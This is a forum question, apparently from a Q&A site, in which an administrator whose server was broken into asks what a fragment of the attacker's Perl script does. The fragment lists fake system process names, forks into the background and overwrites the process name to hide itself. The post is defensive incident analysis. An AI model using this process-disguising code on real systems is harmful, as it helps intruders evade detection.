We had an invasion of our server over the weekend, and I'm trying to track the traces of an attacker. They seem to have run the perl script, forcing the www-data process called init to work at 100%. Unfortunately, I have no perl experience, so I have no idea what this does:
6 my $processo =("atd","sendmail: accepting connections","rpc.idmapd","syslogd -m 0","/sbin/udevd -d","/sbin/init"); # ... 24 use IO::Socket; 25 use Socket; 26 use IO::Select; 27 chdir("/tmp"); 28 $servidor="$ARGV[0]" if $ARGV[0]; 29 $0="$processo"."\0"x16;; 30 my $pid=fork; 31 exit if $pid;
It seems to me that the instruction on line 29 is designed to somehow hide the process. What is he doing exactly?
source share